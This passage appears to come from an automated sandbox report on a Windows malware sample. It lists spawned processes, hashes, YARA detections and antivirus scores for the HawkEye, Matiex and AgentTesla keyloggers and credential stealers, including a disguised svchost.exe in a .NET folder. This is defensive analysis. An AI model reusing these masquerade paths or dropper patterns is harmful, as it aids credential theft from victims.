                                                                                                    • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000019.00000002.347873362.0000000000403000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000019.00000002.347873362.0000000000403000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                    • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000019.00000002.347873362.0000000000403000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                    • Rule: JoeSecurity_Matiex, Description: Yara detected Matiex Keylogger, Source: 00000019.00000003.313769407.00000000037B0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_BedsObfuscator, Description: Yara detected Beds Obfuscator, Source: 00000019.00000003.313769407.00000000037B0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000019.00000003.300769006.0000000000FE3000.00000004.00000001.sdmp, Author: Joe Security

                                                                                                    General

                                                                                                    Start time:14:27:58
                                                                                                    Start date:05/03/2021
                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                                                    Imagebase:0x7ff7488e0000
                                                                                                    File size:51288 bytes
                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language

                                                                                                    General

                                                                                                    Start time:14:28:02
                                                                                                    Start date:05/03/2021
                                                                                                    Path:C:\Windows\explorer.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:'C:\Windows\explorer.exe' 'C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe'
                                                                                                    Imagebase:0x7ff714890000
                                                                                                    File size:3933184 bytes
                                                                                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language

                                                                                                    General

                                                                                                    Start time:14:28:04
                                                                                                    Start date:05/03/2021
                                                                                                    Path:C:\Windows\explorer.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                                                    Imagebase:0x7ff714890000
                                                                                                    File size:3933184 bytes
                                                                                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language

                                                                                                    General

                                                                                                    Start time:14:28:03
                                                                                                    Start date:05/03/2021
                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                    Imagebase:0x7ff7488e0000
                                                                                                    File size:51288 bytes
                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language

                                                                                                    General

                                                                                                    Start time:14:28:04
                                                                                                    Start date:05/03/2021
                                                                                                    Path:C:\Users\user\AppData\Local\Temp\hawkgoods.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:'C:\Users\user\AppData\Local\Temp\hawkgoods.exe' 0
                                                                                                    Imagebase:0x4c0000
                                                                                                    File size:532992 bytes
                                                                                                    MD5 hash:FFDB58533D5D1362E896E96FB6F02A95
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                    Yara matches:
                                                                                                    • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000001E.00000002.392659949.00000000004C2000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000001E.00000002.392659949.00000000004C2000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000001E.00000002.392659949.00000000004C2000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000001E.00000002.392659949.00000000004C2000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                    • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000001E.00000002.392659949.00000000004C2000.00000002.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                    • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 0000001E.00000002.473493158.0000000007AA0000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000001E.00000002.446976394.0000000003BC1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000001E.00000002.446976394.0000000003BC1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                    • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000001E.00000000.309264681.00000000004C2000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000001E.00000000.309264681.00000000004C2000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000001E.00000000.309264681.00000000004C2000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000001E.00000000.309264681.00000000004C2000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                    • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000001E.00000000.309264681.00000000004C2000.00000002.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                    • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000001E.00000002.445844944.0000000002FEC000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                    • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe, Author: Arnim Rupp
                                                                                                    • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe, Author: Joe Security
                                                                                                    • Rule: Hawkeye, Description: detect HawkEye in memory, Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe, Author: JPCERT/CC Incident Response Group
                                                                                                    Antivirus matches:
                                                                                                    • Detection: 100%, Avira
                                                                                                    • Detection: 100%, Avira
                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                    • Detection: 96%, ReversingLabs

                                                                                                    General

                                                                                                    Start time:14:28:05
                                                                                                    Start date:05/03/2021
                                                                                                    Path:C:\Users\user\AppData\Local\Temp\Matiexgoods.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:'C:\Users\user\AppData\Local\Temp\Matiexgoods.exe' 0
                                                                                                    Imagebase:0x4d0000
                                                                                                    File size:455680 bytes
                                                                                                    MD5 hash:80C61B903400B534858D047DD0919F0E
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_Matiex, Description: Yara detected Matiex Keylogger, Source: 0000001F.00000002.476632403.00000000004D2000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_BedsObfuscator, Description: Yara detected Beds Obfuscator, Source: 0000001F.00000002.476632403.00000000004D2000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_Matiex, Description: Yara detected Matiex Keylogger, Source: 0000001F.00000000.312425541.00000000004D2000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_BedsObfuscator, Description: Yara detected Beds Obfuscator, Source: 0000001F.00000000.312425541.00000000004D2000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001F.00000002.517244738.00000000028D1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_Matiex, Description: Yara detected Matiex Keylogger, Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_BedsObfuscator, Description: Yara detected Beds Obfuscator, Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe, Author: Joe Security
                                                                                                    Antivirus matches:
                                                                                                    • Detection: 100%, Avira
                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                    • Detection: 54%, Metadefender
                                                                                                    • Detection: 90%, ReversingLabs

                                                                                                    General

                                                                                                    Start time:14:28:07
                                                                                                    Start date:05/03/2021
                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:'C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe'
                                                                                                    Imagebase:0x410000
                                                                                                    File size:86808 bytes
                                                                                                    MD5 hash:017E52146C9131DBC9487D834CDFC247
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                    Antivirus matches:
                                                                                                    • Detection: 21%, ReversingLabs

                                                                                                    General

                                                                                                    Start time:14:28:08
                                                                                                    Start date:05/03/2021
                                                                                                    Path:C:\Users\user\AppData\Local\Temp\origigoods20.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:'C:\Users\user\AppData\Local\Temp\origigoods20.exe' 0
                                                                                                    Imagebase:0xe50000
                                                                                                    File size:220672 bytes
                                                                                                    MD5 hash:61DC57C6575E1F3F2AE14C1B332AD2FB
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000021.00000002.476654920.0000000000E52000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000021.00000002.516404488.0000000003411000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000021.00000002.516404488.0000000003411000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe, Author: Joe Security
                                                                                                    Antivirus matches:
                                                                                                    • Detection: 100%, Avira
                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                    • Detection: 43%, Metadefender
                                                                                                    • Detection: 93%, ReversingLabs

                                                                                                    General

                                                                                                    Start time:14:28:11
                                                                                                    Start date:05/03/2021
                                                                                                    Path:C:\Windows\explorer.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:'C:\Windows\explorer.exe' 'C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe'
                                                                                                    Imagebase:0x7ff714890000
                                                                                                    File size:3933184 bytes
                                                                                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language

                                                                                                    General

                                                                                                    Start time:14:28:14
                                                                                                    Start date:05/03/2021
                                                                                                    Path:C:\Windows\explorer.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                                                    Imagebase:0x7ff714890000
                                                                                                    File size:3933184 bytes
                                                                                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language

                                                                                                    General

                                                                                                    Start time:14:28:14
                                                                                                    Start date:05/03/2021
                                                                                                    Path:C:\Users\user\AppData\Local\Temp\origigoods40.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:'C:\Users\user\AppData\Local\Temp\origigoods40.exe' 0
                                                                                                    Imagebase:0x160000
                                                                                                    File size:221696 bytes
                                                                                                    MD5 hash:AE36F0D16230B9F41FFECBD3C5B1D660
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000024.00000002.510313698.0000000002771000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000024.00000002.510313698.0000000002771000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000024.00000002.476647618.0000000000162000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000024.00000000.332943540.0000000000162000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe, Author: Joe Security
                                                                                                    Antivirus matches:
                                                                                                    • Detection: 100%, Avira
                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                    • Detection: 43%, Metadefender
                                                                                                    • Detection: 86%, ReversingLabs

                                                                                                    Disassembly

                                                                                                    Code Analysis